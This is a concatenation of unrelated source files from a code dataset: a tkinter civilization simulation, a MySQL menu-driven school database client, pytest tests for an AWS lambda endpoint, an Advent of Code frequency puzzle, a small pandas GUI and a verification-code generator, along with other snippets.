bg=civ_color(((self.m[i][j] % 100) - (self.m[i][j] % 10)) / 10)).grid(row=i,\n column=j,\n sticky=NW)\n elif self.m[i][j] % 10 == 2:\n if self.m[i][j] % 100 < 10:\n Label(self.sub, image=self.image2, bd=0).grid(row=i, column=j, sticky=NW)\n else:\n Label(self.sub, image=self.bor_image2, bd=2,\n bg=civ_color(((self.m[i][j] % 100) - (self.m[i][j] % 10)) / 10)).grid(row=i,\n column=j,\n sticky=NW)\n elif self.m[i][j] % 10 == 3:\n if self.m[i][j] % 100 < 10:\n Label(self.sub, image=self.image3, bd=0).grid(row=i, column=j, sticky=NW)\n else:\n Label(self.sub, image=self.bor_image3, bd=2,\n bg=civ_color(((self.m[i][j] % 100) - (self.m[i][j] % 10)) / 10)).grid(row=i,\n column=j,\n sticky=NW)\n elif self.m[i][j] % 10 == 4:\n if self.m[i][j] % 100 < 10:\n Label(self.sub, image=self.image4, bd=0).grid(row=i, column=j, sticky=NW)\n else:\n Label(self.sub, image=self.bor_image4, bd=2,\n bg=civ_color(((self.m[i][j] % 100) - (self.m[i][j] % 10)) / 10)).grid(row=i,\n column=j,\n sticky=NW)\n elif self.m[i][j] % 10 == 5:\n if self.m[i][j] % 100 < 10:\n Label(self.sub, image=self.image5, bd=0).grid(row=i, column=j, sticky=NW)\n else:\n Label(self.sub, image=self.bor_image5, bd=2,\n bg=civ_color(((self.m[i][j] % 100) - (self.m[i][j] % 10)) / 10)).grid(row=i,\n column=j,\n sticky=NW)\n elif self.m[i][j] % 10 == 6:\n if self.m[i][j] % 100 < 10:\n Label(self.sub, image=self.image6, bd=0).grid(row=i, column=j, sticky=NW)\n else:\n Label(self.sub, image=self.bor_image6, bd=2,\n bg=civ_color(((self.m[i][j] % 100) - (self.m[i][j] % 10)) / 10)).grid(row=i,\n column=j,\n\n sticky=NW)\n else:\n for i in range(len(self.m)):\n for j in range(len(self.m[i])):\n if self.pre_m[i][j] != self.m[i][j]:\n list = self.sub.grid_slaves(i, j)\n if len(list) != 0:\n list[0].grid_forget()\n if self.m[i][j] % 10 == 1:\n if self.m[i][j] % 100 < 10:\n Label(self.sub, image=self.image1, bd=0).grid(row=i, column=j, sticky=NW)\n else:\n Label(self.sub, image=self.image1_c, bd=2,\n bg=civ_color(((self.m[i][j] % 100) - (self.m[i][j] % 10)) / 10)).grid(row=i,\n column=j,\n sticky=NW)\n elif self.m[i][j] % 10 == 2:\n if self.m[i][j] % 100 < 10:\n Label(self.sub, image=self.image2, bd=0).grid(row=i, column=j, sticky=NW)\n else:\n Label(self.sub, image=self.image2_c, bd=2,\n bg=civ_color(((self.m[i][j] % 100) - (self.m[i][j] % 10)) / 10)).grid(row=i,\n column=j,\n sticky=NW)\n elif self.m[i][j] % 10 == 3:\n if self.m[i][j] % 100 < 10:\n Label(self.sub, image=self.image3, bd=0).grid(row=i, column=j, sticky=NW)\n else:\n Label(self.sub, image=self.image3_c, bd=2,\n bg=civ_color(((self.m[i][j] % 100) - (self.m[i][j] % 10)) / 10)).grid(row=i,\n column=j,\n sticky=NW)\n elif self.m[i][j] % 10 == 4:\n if self.m[i][j] % 100 < 10:\n Label(self.sub, image=self.image4, bd=0).grid(row=i, column=j, sticky=NW)\n else:\n Label(self.sub, image=self.image4_c, bd=2,\n bg=civ_color(((self.m[i][j] % 100) - (self.m[i][j] % 10)) / 10)).grid(row=i,\n column=j,\n sticky=NW)\n elif self.m[i][j] % 10 == 5:\n if self.m[i][j] % 100 < 10:\n Label(self.sub, image=self.image5, bd=0).grid(row=i, column=j, sticky=NW)\n else:\n Label(self.sub, image=self.image5_c, bd=2,\n bg=civ_color(((self.m[i][j] % 100) - (self.m[i][j] % 10)) / 10)).grid(row=i,\n column=j,\n sticky=NW)\n elif self.m[i][j] % 10 == 6:\n if self.m[i][j] % 100 < 10:\n Label(self.sub, image=self.image6, bd=0).grid(row=i, column=j, sticky=NW)\n else:\n Label(self.sub, image=self.image6_c, bd=2,\n bg=civ_color(((self.m[i][j] % 100) - (self.m[i][j] % 10)) / 10)).grid(row=i,\n column=j,\n\n sticky=NW)\n\n\n\n def spawn_new_civ(self):\n if (self.m>=10).all():\n tkinter.messagebox.showwarning(title=\"Impossible\",message=\"Map filled. Can't create a new civ.\")\n else:\n self.civ_frame = Toplevel(self.root)\n self.CivList = (\"expert\", \"warrior\",\"moderate\")\n self.civmenu_v = StringVar()\n self.civmenu_v.set(self.CivList[0])\n self.label4 = Label(self.civ_frame, text=\"Choose civ type :\")\n self.label4.grid(row=0, column=0, sticky=W)\n self.civto = OptionMenu(self.civ_frame, self.civmenu_v, *self.CivList)\n self.civto.grid(row=0, column=1, sticky=W)\n self.label5 = Label(self.civ_frame, text=\"After submitting, click on the map the position \\nwhere it should spawn(must be unconquered)\\nPress c key to cancel after submit.\")\n self.label5.grid(row=1, column=0, sticky=W)\n self.civsubmit = Button(self.civ_frame, text=\"Submit civ\", command=self.submit_civ)\n self.civsubmit.grid(row=2, column=1, sticky=W)\n\n def submit_civ(self):\n self.civ_frame.destroy()\n self.root.bind(\"\",self.place_civ)\n self.root.bind(\"\",self.cancel_creation)\n\n def place_civ(self,event):\n new_y, new_x = self.sub.grid_location(event.x_root - self.sub.winfo_rootx(), event.y_root - self.sub.winfo_rooty())\n print(new_x)\n print(new_y)\n if math.floor(self.m[new_x][new_y] / 10)>0:\n tkinter.messagebox.showerror(title=\"Used area\",message=\"Please select a free space.To cancel creation, press c key.\")\n else:\n create_civ(self.civmenu_v.get())\n self.root.unbind(\"\")\n self.root.unbind(\"\")\n self.m = spawn_civ(dic_civ[civ_counter],self.m,new_x,new_y)\n list = self.sub.grid_slaves(new_x, new_y)\n list[0].grid_forget()\n field = self.m[new_x][new_y]%10\n field_image = self.image1_c\n if field == 1:\n field_image = self.image1_c\n elif field == 2:\n field_image = self.image2_c\n elif field == 3:\n field_image = self.image3_c\n elif field == 4:\n field_image = self.image4_c\n elif field == 5:\n field_image = self.image5_c\n elif field == 6:\n field_image = self.image6_c\n Label(self.sub, image=field_image, bd=2,bg=civ_color(civ_counter)).grid(row=new_x,column=new_y,sticky=NW)\n\n def cancel_creation(self,event):\n tkinter.messagebox.showinfo(title=\"Canceled Creation\",message=\"Creation canceled.\")\n self.root.unbind(\"\")\n self.root.unbind(\"\")\n\n def copy_map(self):\n if self.turn == 0:\n self.pre_m = np.random.randint(0, 1, (45, 45))\n else:\n np.copyto(self.pre_m,self.m)\n\n def higher_gap(self,iteration):\n if iteration <=2000:\n return 1\n elif iteration <=2500:\n return 2\n elif iteration <=3000:\n return 4\n elif iteration <= 3500:\n return 8\n return 10\n def simulate(self):\n L=[]\n self.turn += 1\n dyn = self.dyn_type\n #print(dyn)\n self.copy_map()\n #print(self.pre_m)\n if dyn == 1:\n for k in dic_civ:\n if dic_civ[k][\"food\"]<0:\n self.m = safe_reaction(k, self.m)\n else:\n dic_civ[k][\"reaction\"] = 0\n self.m = dynamics_civ(dic_civ[k], self.m)\n L.append(k)\n for i in L:\n update_population(dic_civ[i])\n update_trading()\n if dic_civ[i][\"population\"] <= 0:\n delete_civ(self.m, dic_civ[i])\n elif dyn == 2:\n self.m = iterate(self.m)\n self.show_once()\n self.update_labels()\n #print(\"Once\")\n\n #print(self.m)\n\n '''print(\"warriors food:\\t\", dic_civ[1][\"food\"])\n print(\"experts food:\\t\", dic_civ[2][\"food\"])\n print(\"moderates food:\\t\", dic_civ[3][\"food\"])\n print(\"warriors iron:\\t\", dic_civ[1][\"iron\"])\n print(\"experts iron:\\t\", dic_civ[2][\"iron\"])\n print(\"moderates iron:\\t\", dic_civ[3][\"iron\"])\n print(\"warriors population :\\t\", dic_civ[1][\"population\"])\n print(\"expert population :\\t\", dic_civ[2][\"population\"])\n print(\"moderate population :\\t\", dic_civ[3][\"population\"])\n print(\"warriors food paid per turn :\\t\", dic_civ[1][\"population\"] / 2000)\n print(\"expert food paid per turn :\\t\", dic_civ[2][\"population\"] / 2000)\n print(\"moderate food paid per turn :\\t\", dic_civ[3][\"population\"] / 2000)\n print(\"warriors food per turn :\\t\", dic_civ[1][\"food_per_turn\"])\n print(\"expert food per turn :\\t\", dic_civ[2][\"food_per_turn\"])\n print(\"moderate food per turn :\\t\", dic_civ[3][\"food_per_turn\"])\n print(\"warriors territories :\\t\", dic_civ[1][\"territories\"])\n print(\"expert territories :\\t\", dic_civ[2][\"territories\"])\n print(\"moderate territories :\\t\", dic_civ[3][\"territories\"])'''\n\n\nShow()\n","sub_path":"AREcivV2.6.py","file_name":"AREcivV2.6.py","file_ext":"py","file_size_in_byte":58103,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"393065130","text":"import subprocess as sp\nimport pymysql\nimport pymysql.cursors\nfrom insertions import *\nfrom updates import *\nfrom deletions import *\nfrom functional import *\nfrom analysis import *\nfrom showtables import *\n\n\ndef createAccount():\n row = {}\n print(\"Enter new Account details: \")\n name = (input(\"Name (Fname Lname): \")).split(' ')\n row['First_name'] = name[0]\n row['Family_name'] = name[1]\n row['Email_id'] = input(\"Email_id: \")\n row['Password'] = input(\"Password: \")\n row['Mobile'] = input(\"Mobile_no: \")\n row['Sex'] = input(\"Sex: \")\n\n row['Address'] = []\n n = int(input(\"Number of Addresses: \"))\n for i in range(n):\n row['Address'].append(input(\"Address {}: \".format(i + 1)))\n\n subclass = input(\"Are you a INSTRUCTOR or STUDENT ? : \")\n\n if subclass == \"STUDENT\":\n row['Roll_no'] = int(input(\"Roll_no: \"))\n row['Batch'] = input(\"Batch: \")\n elif subclass == \"INSTRUCTOR\":\n row['Degree'] = []\n n = int(input(\"Number of Degrees: \"))\n for i in range(n):\n row['Degree'].append(input(\"Degree {}: \".format(i + 1)))\n\n print(insert_account(con, row, subclass))\n\n\ndef createTeam():\n row = {}\n print(\"Enter new Team details: \")\n row['Team_name'] = input(\"Team Name: \")\n row['Course_name'] = input(\"Course Name: \")\n row['Details'] = input(\"Details: \")\n row['Admin_id'] = input(\"Admin Email_id: \")\n\n row['Textbook'] = []\n n = int(input(\"Number of Textbooks: \"))\n for i in range(n):\n row['Textbook'].append(input(\"Textbook {}: \".format(i + 1)))\n\n print(insert_team(con, row))\n\n\ndef createChannel():\n row = {}\n print(\"Enter Channel details: \")\n row['Team_name'] = input(\"Team Name\")\n row['Channel_name'] = input('Channel Name')\n\n print(insert_channel(con, row))\n\n\ndef addMeeting():\n row = {}\n print(\"Enter Meeting details: \")\n row['Team_name'] = input(\"Team Name: \")\n row['Channel_name'] = input(\"Channel Name: \")\n row['Org_id'] = input(\"Organiser Email_id: \")\n row['Start_time'] = input(\"Start Time (YYYY-MM-DD HH:MM:SS): \")\n row['End_time'] = input(\"End Time (YYYY-MM-DD HH:MM:SS): \")\n\n print(insert_meeting(con, row))\n\n\ndef addMember():\n row = {}\n print(\"Enter Details: \")\n row['Team_name'] = input(\"Team Name: \")\n row['Member_id'] = input(\"Member Email_id: \")\n\n print(insert_membership(con, row))\n\n\ndef addAttendee():\n row = {}\n print(\"Enter Details: \")\n row['Team_name'] = input(\"Team Name: \")\n row['Channel_name'] = input(\"Channel Name: \")\n row['Org_id'] = input(\"Organiser Email_id: \")\n row['SRoll_no'] = int(input(\"Attendee Roll_no: \"))\n row['Start_time'] = input(\n \"Enter meeting start time (YYYY-MM-DD HH:MM:SS):\")\n\n print(insert_attends(con, row))\n\n\ndef addQuestion():\n row = {}\n print(\"Enter Question Details: \")\n row['Q_id'] = int(input(\"Q_id: \"))\n row['Qn_text'] = input(\"Question Text: \")\n row['Course_name'] = input(\"Course Name: \")\n\n print(insert_question(con, row))\n\n\ndef addAnswer():\n row = {}\n print(\"Enter Answer Details\")\n row['Q_id'] = int(input(\"Q_id: \"))\n row['Answer'] = input(\"Answer: \")\n row['Marks'] = int(input(\"Marks: \"))\n\n print(insert_quesans(con, row))\n\n\ndef addQuiz():\n row = {}\n print(\"Enter Quiz Details: \")\n row['Quiz_no'] = int(input(\"Quiz_no: \"))\n row['Course_name'] = input(\"Course Name: \")\n row['No_of_qn'] = int(input(\"Number of Questions: \"))\n\n print(insert_quiz(con, row))\n\n\ndef addQuizStudent():\n row = {}\n print(\"Enter Details: \")\n row['SRoll_no'] = int(input(\"Student Roll_no: \"))\n row['Quiz_no'] = int(input(\"Quiz_no: \"))\n row['Course_name'] = input(\"Course Name: \")\n\n print(insert_gives(con, row))\n\n\ndef addResponse():\n row = {}\n print(\"Enter Response Details: \")\n row['Quiz_no'] = int(input(\"Quiz_no: \"))\n row['Course_name'] = input(\"Course Name: \")\n row['Q_id'] = int(input(\"Q_id: \"))\n row['SRoll_no'] = int(input(\"Student Roll_no: \"))\n row['Inst_Email_id'] = input(\"Instructor Email_id: \")\n row['Answer'] = input(\"Answer: \")\n row['Marks'] = int(input(\"Enter marks allotted:\"))\n\n print(insert_response(con, row))\n\n\ndef updateMarks():\n print(\"Enter Details: \")\n q_id = int(input(\"Q_id: \"))\n ans = input(\"Answer: \")\n new_marks = int(input(\"New Marks: \"))\n\n print(update_marks(con, q_id, ans, new_marks))\n\n\ndef updateAddress():\n print(\"Enter Details: \")\n email = input(\"Email_id: \")\n old_add = input(\"Old Address: \")\n new_add = input(\"New Address: \")\n\n print(update_address(con, email, old_add, new_add))\n\n\ndef updateMobile():\n print(\"Enter Details: \")\n email = input(\"Email_id: \")\n new_mob = input(\"New Mobile Number: \")\n\n print(update_mobile(con, email, new_mob))\n\n\ndef deleteAccount():\n print(\"Enter Details: \")\n email = input(\"Email_id: \")\n\n print(delete_account(con, email))\n\n\ndef dispatch(ch):\n try:\n if(ch == '1'):\n createAccount()\n elif(ch == '2'):\n createTeam()\n elif(ch == '3'):\n addMember()\n elif(ch == '4'):\n createChannel()\n elif(ch == '5'):\n addMeeting()\n elif(ch == '6'):\n addAttendee()\n elif(ch == '7'):\n addQuestion()\n elif(ch == '8'):\n addAnswer()\n elif(ch == '9'):\n addQuiz()\n elif(ch == '10'):\n addQuizStudent()\n elif(ch == '11'):\n addResponse()\n elif(ch == '12'):\n updateMarks()\n elif(ch == '13'):\n updateAddress()\n elif(ch == '14'):\n updateMobile()\n elif(ch == '15'):\n deleteAccount()\n elif(ch == '16'):\n sel1(con)\n elif(ch == '17'):\n sel2(con)\n elif(ch == '18'):\n sel3(con)\n elif(ch == '19'):\n sel4(con)\n elif(ch == '20'):\n proj1(con)\n elif(ch == '21'):\n proj2(con)\n elif(ch == '22'):\n agg1(con)\n elif(ch == '23'):\n agg2(con)\n elif(ch == '24'):\n search(con)\n elif(ch == '25'):\n analysis1(con)\n elif(ch == '26'):\n analysis2(con)\n elif(ch == '27'):\n analysis3(con)\n elif(ch == '28'):\n show1(con)\n elif(ch == '29'):\n show2(con)\n elif(ch == '30'):\n show3(con)\n elif(ch == '31'):\n show4(con)\n elif(ch == '32'):\n show5(con)\n elif(ch == '33'):\n show6(con)\n elif(ch == '34'):\n show7(con)\n elif(ch == '35'):\n show8(con)\n elif(ch == '36'):\n show9(con)\n else:\n print(\"Invalid Option\")\n\n except Exception as e:\n tmp = sp.call('clear', shell=True)\n print(e)\n tmp = input(\"Enter any key to CONTINUE>\")\n\n\ncon = []\nwhile(1):\n tmp = sp.call('clear', shell=True)\n\n username = input(\"Enter username:\")\n password = input(\"Enter password:\")\n port = input(\"Enter port num(leave blank for default):\")\n if port == \"\":\n port = 3306\n else:\n port = int(port)\n\n try:\n con\n con = pymysql.connect(host='localhost', user=username, password=password, port=port,\n db='DfOEP', cursorclass=pymysql.cursors.DictCursor)\n tmp = sp.call('clear', shell=True)\n\n if(con.open):\n print(\"Connected\")\n else:\n print(\"Failed to connect\")\n\n tmp = input(\"Enter any key to CONTINUE>\")\n\n while(1):\n tmp = sp.call('clear', shell=True)\n print(\"0. Exit\")\n print()\n print(\"Insertions: \")\n print(\"1. Create a new Account.\")\n print(\"2. Create a new Team.\")\n print(\"3. Add Member to a Team.\")\n print(\"4. Create a new Channel.\")\n print(\"5. Add a new Meeting.\")\n print(\"6. Add Attendee for a Meeting.\")\n print(\"7. Add a Question.\")\n print(\"8. Add Answer and Marks for a Question\")\n print(\"9. Add a Quiz.\")\n print(\"10. Add Student who gives a Quiz.\")\n print(\"11. Add Response for a Quiz.\")\n print()\n print(\"Updations: \")\n print(\"12. Update Marks of a Question.\")\n print(\"13. Update Address of an Account.\")\n print(\"14. Update Mobile Number of an Account.\")\n print()\n print(\"Deletions: \")\n print(\"15. Delete an Account.\")\n print()\n print(\"Selections: \")\n print(\"16. Print Course Details and preferred textbooks of a Team.\")\n print(\"17. List Members of a Team.\")\n print(\"18. List Members of a Meeting.\")\n print(\"19. Find Marks per Question of a Quiz.\")\n print()\n print(\"Projections: \")\n print(\"20. Details of all Students in a Batch.\")\n print(\"21 Top 10 scoring Students in a Batch.\")\n print()\n print(\"Aggregate Functions: \")\n print(\"22. Average Marks of Students in Quizzes for the Course.\")\n print(\"23. Attendance of a Student.\")\n print()\n print(\"Search Functions: \")\n print(\"24. Search Student Details.\")\n print()\n print(\"Analysis: \")\n print(\"25. Measure effectiveness of online teaching.\")\n print(\"26. Student Report Card.\")\n print(\"27. Relation between Student's Marks and Attendance.\")\n print()\n print(\"Show Tables: \")\n print(\"28. List all Accounts in the database.\")\n print(\"29. Print Address of an Account.\")\n print(\"30. List all Students in the database.\")\n print(\"31. List all Instructors in the database.\")\n print(\"32. Print Degrees of an Instructor.\")\n print(\"33. List all Teams an Account is part of.\")\n print(\"34. List all Channels in a Team.\")\n print(\"35. List all Teams in the database.\")\n print(\"36. List all Quizzes in a Course.\")\n print()\n\n ch = input(\"Enter choice > \")\n tmp = sp.call('clear', shell=True)\n if ch == '0':\n break\n elif(ch != \"\"):\n dispatch(ch)\n tmp = input(\"Enter any key to CONTINUE>\")\n\n except:\n tmp = sp.call('clear', shell=True)\n print(\"Connection Refused: Either username or password is incorrect or user doesn't have access to database\")\n tmp = input(\"Enter any key to CONTINUE>\")\n break\n","sub_path":"code/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"140161825","text":"import json\n\nfrom pytest_cases import (\n cases_data,\n CaseDataGetter,\n)\n\nfrom lambda_functions.v1.functions.checklists.app.checklists import (\n lambda_handler,\n transform_event_to_sirius_payload,\n validate_event,\n)\nfrom lambda_functions.v1.tests.helpers.use_test_data import (\n is_valid_schema,\n load_data,\n build_aws_event,\n)\nfrom lambda_functions.v1.tests.checklists import checklists_endpoint_test_cases\n\n\ndef test_lambda_handler(\n patched_requests, patched_get_secret, patched_validate_event_success\n):\n event = load_data(\"checklists_event.json\", as_json=False)\n context = None\n\n result = lambda_handler(event=event, context=context)\n assert result[\"statusCode\"] == 201\n assert is_valid_schema(result, \"standard_lambda_response_schema.json\")\n assert is_valid_schema(json.loads(result[\"body\"]), \"201_created_schema.json\")\n\n\ndef test_lambda_handler_fail(\n patched_requests, patched_get_secret, patched_validate_event_fail\n):\n event = load_data(\"checklists_event.json\", as_json=False)\n context = None\n\n result = lambda_handler(event=event, context=context)\n assert result[\"statusCode\"] == 400\n assert is_valid_schema(result, \"standard_lambda_response_schema.json\")\n\n\n@cases_data(module=checklists_endpoint_test_cases)\ndef test_validate_event(case_data: CaseDataGetter):\n body, case_ref, report_id, expected_result = case_data.get()\n path_params = {\"caseref\": case_ref, \"id\": report_id}\n event = build_aws_event(\n event_body=json.dumps(body), event_path_parementers=path_params, as_json=False\n )\n\n valid_event, errors = validate_event(event)\n\n assert valid_event == expected_result[0]\n assert sorted(errors) == sorted(expected_result[1])\n\n\ndef test_transform_event_to_sirius_request(\n default_checklists_request_body,\n default_request_case_ref,\n default_request_report_id,\n default_sirius_checklists_request,\n):\n path_params = {\"caseref\": default_request_case_ref, \"id\": default_request_report_id}\n event = build_aws_event(\n event_body=json.dumps(default_checklists_request_body),\n event_path_parementers=path_params,\n as_json=False,\n )\n\n payload = transform_event_to_sirius_payload(event)\n\n assert is_valid_schema(json.loads(payload), \"sirius_documents_payload_schema.json\")\n assert payload == json.dumps(default_sirius_checklists_request)\n\n\ndef test_transform_event_to_sirius_request_with_no_report_submission(\n default_request_case_ref,\n nondigital_request_report_id,\n checklists_request_body_with_no_report_submission,\n sirius_checklists_request_with_no_report_submission,\n):\n path_params = {\n \"caseref\": default_request_case_ref,\n \"id\": nondigital_request_report_id,\n }\n event = build_aws_event(\n event_body=json.dumps(checklists_request_body_with_no_report_submission),\n event_path_parementers=path_params,\n as_json=False,\n )\n\n payload = transform_event_to_sirius_payload(event)\n\n assert is_valid_schema(json.loads(payload), \"sirius_documents_payload_schema.json\")\n assert payload == json.dumps(sirius_checklists_request_with_no_report_submission)\n\n\ndef test_sirius_request_has_report_id_from_path(\n default_checklists_request_body,\n default_request_case_ref,\n default_request_report_id,\n default_sirius_checklists_request,\n):\n default_checklists_request_body[\"checklist\"][\"data\"][\"attributes\"][\n \"report_id\"\n ] = \"uuid_from_attributes\"\n path_params = {\"caseref\": default_request_case_ref, \"id\": \"uuid_from_path\"}\n event = build_aws_event(\n event_body=json.dumps(default_checklists_request_body),\n event_path_parementers=path_params,\n as_json=False,\n )\n\n payload = transform_event_to_sirius_payload(event)\n\n assert json.loads(payload)[\"metadata\"][\"report_id\"] == \"uuid_from_path\"\n","sub_path":"lambda_functions/v1/tests/checklists/test_checklists_endpoint.py","file_name":"test_checklists_endpoint.py","file_ext":"py","file_size_in_byte":3857,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"111445795","text":"#!/usr/bin/python3\n\nimport time\nimport itertools\n\n#################\n# Part 1\n#################\n\n\ndef calc_frequency(sequence: [], f=0) -> int:\n \"\"\"\n sequence: sequence of frequency changes\n f: initial frequency f\n \"\"\"\n for df in sequence:\n f = f + df\n return f\n\n\ndef input_to_sequence(inputstr: str) -> []:\n seq = [int(l) for l in inputstr.split()]\n return seq\n\n\ndef part1test():\n # test examples\n testinput = \"\"\"\n +1\n -2\n +3\n +1\n \"\"\"\n testinput_sequence = [1, -2, 3, 1]\n\n assert (input_to_sequence(testinput) == testinput_sequence)\n\n assert (calc_frequency([1, -2, 3, 1]) == 3)\n assert (calc_frequency([1, 1, 1]) == 3)\n assert (calc_frequency([1, 1, -2]) == 0)\n assert (calc_frequency([-1, -2, -3]) == -6)\n print(\"tests passed\")\n\n\ndef part1(myinput: str) -> None:\n result = calc_frequency(input_to_sequence(myinput))\n print(\"answer:\" + str(result))\n\n\n###############\n# Part 2\n###############\n\ndef find_repeatedfreq(sequence: [], f=0) -> int:\n freqs = set([f])\n for df in itertools.cycle(sequence):\n f = f + df\n if f not in freqs:\n freqs.add(f)\n else:\n return f\n\ndef part2test() -> None:\n # test input\n testinput_sequence = [1, -2, 3, 1]\n test_output = find_repeatedfreq(testinput_sequence)\n assert (test_output == 2)\n\n assert (find_repeatedfreq([+1, -1]) == 0)\n assert (find_repeatedfreq([+3, +3, +4, -2, -4]) == 10)\n assert (find_repeatedfreq([-6, +3, +8, +5, -6]) == 5)\n assert (find_repeatedfreq([+7, +7, -2, -7, -4]) == 14)\n print(\"tests passed\")\n\n\ndef part2(myinput: str) -> None:\n myinput_sequence = input_to_sequence(MYINPUT)\n result = find_repeatedfreq(myinput_sequence)\n print(\"answer:\" + str(result))\n\n###############\n# Main\n###############\n\n\nif __name__ == \"__main__\":\n\n # my input\n with open('data/day1') as f:\n MYINPUT = f.read()\n\n print(\"Part 1:\")\n part1test()\n t0 = time.time()\n part1(MYINPUT)\n print(\"time: \" + str(time.time() - t0))\n \n \n print(\"Part 2:\")\n part2test()\n t0 = time.time()\n part2(MYINPUT)\n print(\"time: \" + str(time.time() - t0))\n","sub_path":"day01_chronalcalibration.py","file_name":"day01_chronalcalibration.py","file_ext":"py","file_size_in_byte":2172,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"107078095","text":"import pandas as pd\nimport PySimpleGUI as sg\nimport numpy as np\nfrom AI import data\nfrom func import returnarray\n\ndef GUI2(df):\n col=returnarray(df.columns)\n layout=[[sg.Text('Wrangling et description')],\n [sg.Listbox(values=col),sg.ReadButton('+/-'),sg.Listbox(values=[])], \n [sg.Text('Correlation:'),sg.ReadButton('voir',key='corr')], \n [sg.Text('anova:'),sg.ReadButton('voir',key='anova')], \n [sg.Text('pearson:'),sg.ReadButton('voir',key='pearson')],\n [sg.VerticalSeparator(pad=None)],\n [sg.Text('description:'),sg.ReadButton('voir',key='desc')], \n [sg.Text('groupe-pivot:'),sg.Text('index:'),sg.Input(),sg.Text('colonne:'),sg.Input(),sg.ReadButton('voir',key='piv')],\n #no more separator\n [sg.Text('frame:'),sg.Combo(['plot','hist'])],#resultats et plotting \n [sg.Input(),sg.ReadButton('Executer'),sg.Input()]]\n window = sg.Window('preprocessing', layout)\n event, values = window.Read()\n while True:\n event, values = window.Read()\n if event == \"Executer\":\n if values[0]==True and values[2]!=None:\n df[values[1]]=exec(values[2])\n if values[3]==True:\n df[values[4]]=df[values[4]].astype(values[5])\n if values[6]==True:\n df[values[7]].replace(np.nan,values[8])\n if values[9]==True:\n df.dropna(subset=[values[10]],axis=int(values[11]))\n if values[12]==True:\n bins=np.linspace(min(df[values[13]]),max(df[values[13]]),int(values[14])+1)\n group=returnarray(values[15])\n df['new'+values[13]]=pd.cut(df[values[13]],bins,labels=group,include_lowest=True)\n if event == \"Fin\":\n window.Close()\n break","sub_path":"GUI2.py","file_name":"GUI2.py","file_ext":"py","file_size_in_byte":2025,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"555815563","text":"from matplotlib import pyplot as plt\r\n\r\nx = range(2, 26, 2)\r\ny = [12, 16, 18, 22, 26, 15, 19, 18, 26, 23, 14, 17]\r\nfig = plt.figure(figsize=(20, 8), dpi=80)\r\nplt.plot(x, y)\r\nplt.xticks(range(2, 25, 1))\r\nplt.yticks(range(min(y), max(y)+1))\r\nplt.savefig(\"./m01.png\")\r\nplt.show()\r\n","sub_path":"matplotlib 01.py","file_name":"matplotlib 01.py","file_ext":"py","file_size_in_byte":278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"635293433","text":"def solve():\n\tvillages.sort()\n\n\tboundaries = []\n\n\tfor i in range(n - 1):\n\t\tvillage_left = villages[i]\n\t\tvillage_right = villages[i + 1]\n\n\t\tboundary = (village_left + village_right) / 2\n\t\tboundaries.append(boundary)\n\n\tmin_neighborhood = float(\"inf\")\n\n\tfor i in range(n - 2):\n\t\tneighborhood = boundaries[i + 1] - boundaries[i]\n\n\t\tif neighborhood < min_neighborhood:\n\t\t\tmin_neighborhood = neighborhood\n\n\treturn\n\n\nn = int(input())\n\nvillages = []\n\nfor _ in range(n):\n\tposition = int(input())\n\n\tvillages.append(position)\n\nsol = solve()\nprint(sol)","sub_path":"2018/s1.py","file_name":"s1.py","file_ext":"py","file_size_in_byte":540,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"486893176","text":"import random\nfrom types import IntType\nfrom persistent import Persistent\nfrom BTrees.IIBTree import IIBTree\nfrom zope.interface import implements, Interface\n\nRETRIES = 1000\nLOWER = 100001\nUPPER = 999999\n\n\nclass IVerificationCodeUtility(Interface):\n \n def generate(self, order):\n \"\"\"\n \"\"\"\n\n def is_unique(self, context, verification_code):\n \"\"\"\n \"\"\"\n\n def add(self, verification_code, order):\n \"\"\"\n \"\"\"\n\n\nclass VerificationCodeUtility(Persistent):\n \n implements(IVerificationCodeUtility)\n\n def __init__(self):\n self._verification_codes = IIBTree()\n\n def generate(self, order):\n verification_code = random.randint(LOWER, UPPER)\n count = 0\n while not self.is_unique(verification_code) and count < RETRIES:\n count += 1\n verification_code = random.randint(LOWER, UPPER)\n\n if count > RETRIES - 1:\n raise Exception('Could not find unique verification code.')\n \n self.add(verification_code, order)\n return str(verification_code)\n \n def is_unique(self, code):\n if code in self._verification_codes.keys():\n return False\n else:\n return True\n\n def add(self, verification_code, order):\n order_id = order.getId()\n if not isinstance(order_id, IntType):\n order_id = int(order_id)\n\n self._verification_codes[verification_code] = order_id\n","sub_path":"emas/app/utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":1458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"653758476","text":"'''\nTake two numbers from the user, one representing the start and one the end of a sequence.\nUsing a loop, sum all numbers from the first number through to the second number.\n\nFor example, if a user enters 1 and 100, the sequence would be all integer numbers from 1 to 100.\nThe output of your calculation should therefore look like this:\n\nThe sum is: 5050\n'''\nstartnum = int(input(\"Start of number sequence: \"))\nendnum = int(input(\"End of number sequence: \"))\n\nsum = 0\n\nfor n in range(startnum,endnum+1):\n sum += n\n\nprint(f\"Sum of sequence is {sum}\")\n","sub_path":"labs/04_conditionals_loops/04_05_sum.py","file_name":"04_05_sum.py","file_ext":"py","file_size_in_byte":555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"15000194","text":"## GLOBALS / CONSTANTS ##\nPCA_N_COMPONENTS = 100\nMLP_ID = 1\nSVM_ID = 2\nNO_MATCH = \"no_match\"\nDEBUG = True\nUSE_CACHED_MODEL = False\nSMALL_MODEL = True\nSMILE_DATASET_PATH = \"data/smile_home\"\nSMALL_DATA_PATH = \"data/smile_home\"\nPREPROCESSOR_CACHE_PATH = \"data/preprocessor_cache\"\n\nBEST_SMALL_MODEL = {'hidden_layer_sizes':(2,1), 'alpha':1.1, 'beta_1':0.9, 'learning_rate':'constant', 'max_iter':3000, 'batch_size': 